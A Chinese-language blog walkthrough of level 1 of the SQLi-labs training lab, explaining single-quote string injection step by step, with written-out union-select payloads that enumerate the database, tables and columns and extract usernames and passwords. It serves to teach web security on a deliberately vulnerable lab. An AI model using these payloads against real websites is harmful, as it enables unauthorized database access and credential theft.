SQLI-labs-第一关

知识点:单引号字符型注入

思路:

1、根据提示,为get注入,在url中输入内容
2、判断注入点

输入?id=1',显示数据库语句错误,说明这里存在sql注入漏洞

输入?id=1' and 1=1 --+ ,回显正常,因为--+是注释符,把原本sql语句后面的单引号(')注释掉了,所以整句sql语句是这样的:

SELECT * FROM users WHERE id='1' and 1=1 --+' LIMIT 0,1(红色部分会注释掉)

输入and 1=2 ,结果没有正常回显出来,但是sql语句的语法是正确的,所以不会爆sql语法错误

3、判断目前该表的字段数

使用order by 语句,?id=1' order by 1 --+ 从1尝试到报错

这里尝试到3不会报错,到4就报错,说明有3个字段

4、判断回显位置

?id=1' and 1=2 union select 1,2,3 --+

因为有三个字段,所以我们是select 1,2,3 ,为什么是and 1=2呢?是因为1=1是ture,结合整改语句,它会回显本来的值,改成1=2,则会回显后面的语句(select 1,2,3),就会把相应的值回显出来(两个 sql 语句进行联合操作时,当前一个语句选择的内容为空,我们这里就将后面的语句的内容显示出来)

通过结果我们可以知道,2跟3都是值回显的位置,我们可以在 2或3 的位置构造数据库语句,爆出我们想要的值

5、爆库名

?id=1' and 1=2 union select 1,2,database() --+

6、爆表名

这时候需要用到函数group_concat()和MySQL的系统表information_schema

group_concat()完整语法如下:

复制代码
group_concat([DISTINCT] 要连接的字段 [Order BY ASC/DESC 排序字段] [Separator '分隔符'])

数据库版本再5.0以上时,information_schema数据库里面拥有库名、表名字段

?id=1' and 1=2 union select 1,2,group_concat(table_name) from information_schema.tables where table_schema='security' --+

7、爆字段名

以爆user表的字段为例

?id=1' and 1=2 union select 1,2,group_concat(column_name) from information_schema.columns where table_schema='security' and table_name='users' --+

8、爆值

从前面我们得到数据库的库名、表名、字段名,我们接下来使用concat_ws()这个函数进行爆值

concat_ws(sep,s1,s2,s3...):将s1,s2,s3连接成字符串,并用sep字符间隔

?id=1' and 1=2 union select 1,2,concat_ws(',',id,username,password) from security.users limit 0,1 --+

有些数据库的类型有长度限制,所以我们不能一下子把所有数据爆出来,通过limit语句,一句一句爆

以此类推,你就可以得到该数据库的所有数据


这篇文章就先写到这里了,哪里不好的请批评指正!

相关推荐
S1998_1997111609•X10 小时前
论当今社会主义与人文关怀人格思想下的恶意仿生注入污染蜜罐描述进行函数值非法侵入爬虫的咼忄乂癿〇仺⺋.
数据库·网络协议·百度·ssh·开闭原则
倔强的石头_11 小时前
kingbase备份与恢复实战(六)—— 备份自动化与保留策略:Windows任务计划+日志追溯
数据库
轻刀快马11 小时前
别被 ORM 框架宠坏了:从一场“订单消失”悬案,看懂 MySQL 为什么要强推 InnoDB
数据库·mysql
学网安的肆伍11 小时前
【043-WEB攻防篇】PHP应用&SQL注入&符号拼接&请求方法&HTTP头&JSON&编码类
sql·安全·php
后端漫漫13 小时前
Redis 客户端工具体系
数据库·redis·缓存
PaperData14 小时前
1988-2025年《中国人口和就业统计年鉴》全年份excel+PDF
数据库·人工智能·数据分析·经管
星河耀银海15 小时前
C语言与数据库交互:SQLite实战与数据持久化
c语言·数据库·sqlite·交互
过期动态15 小时前
MySQL中的约束
android·java·数据库·spring boot·mysql
程序员陆通15 小时前
月烧 400 刀到不到 20 刀:我是怎么把 OpenClaw 的 Token 账单砍掉 95% 的
java·前端·数据库
Shan120515 小时前
站在计算机领域视角看:SQL注入攻击
网络·数据库·sql